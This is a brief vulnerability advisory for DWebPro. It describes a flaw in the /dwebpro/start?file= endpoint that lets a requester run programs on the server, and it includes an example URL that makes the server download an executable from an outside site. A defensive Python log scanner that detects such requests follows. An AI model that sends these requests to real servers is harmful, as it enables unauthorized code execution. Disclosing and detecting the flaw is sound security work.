The latest version of DWebPro allows an attacker to execute any program. Just open this in your browser:
The notepad.exe will then open a text file called hi in C:\ on the server side.
If you try this: http://127.0.0.1:8080/dwebpro/start?file=http://www.somesite.com.br/somefile.exe it will open a browser
on the server side and download the file.
It’s really dangerous.
I tested this on the latest version, but it may work on older versions as well.
Best Regards,
Rafael Sousa
DWebPro command injection
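
For defenders checking whether the endpoint described above has been reached on their own servers, the following added example (not part of the original advisory, and not DWebPro code) scans web access logs for requests to /dwebpro/start that carry a file parameter. The Common Log Format layout, the case-insensitive path match and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (Common Log Format is an assumption;
# the advisory does not say what DWebPro logs).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /dwebpro/start?file=http://files.example/a.exe HTTP/1.1" 200 0
10.0.0.9 - - [01/Jan/2024:10:00:07 +0000] "GET /DWebPro/Start?x=1&file=C%3A%5Chi.txt HTTP/1.1" 200 0
127.0.0.1 - - [01/Jan/2024:10:00:09 +0000] "GET /dwebpro/start?file=readme.txt HTTP/1.1" 200 0
10.0.0.7 - - [01/Jan/2024:10:00:11 +0000] "GET /docs/dwebpro/start.html HTTP/1.1" 200 90
"""

REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "(\S+) (\S+)[^"]*"')
LOOPBACK = {"127.0.0.1", "::1"}

def classify(value):
    """Label the decoded file= value: remote URL, absolute local path, or other."""
    if re.match(r"^[a-z][a-z0-9+.-]*://", value, re.I):
        return "remote-url"
    if re.match(r"^([a-z]:[\\/]|\\\\|/)", value, re.I):
        return "absolute-path"
    return "relative"

def find_start_requests(log_text):
    """Return (client, kind, value) for each /dwebpro/start request with file=."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, _method, target = m.groups()
        parts = urlsplit(target)
        if parts.path.rstrip("/").lower() != "/dwebpro/start":
            continue
        for value in parse_qs(parts.query).get("file", []):  # percent-decoded
            hits.append((client, classify(value), value))
    return hits

def external_hits(log_text):
    """Hits whose client is not loopback: the ones to triage first."""
    return [h for h in find_start_requests(log_text) if h[0] not in LOOPBACK]

if __name__ == "__main__":
    for client, kind, value in find_start_requests(SAMPLE_LOG):
        flag = "LOCAL" if client in LOOPBACK else "EXTERNAL"
        print(f"{flag:8} {client:12} {kind:14} {value}")
```

Any hit from a non-loopback client means the start endpoint is reachable over the network and should be blocked at the listener or firewall.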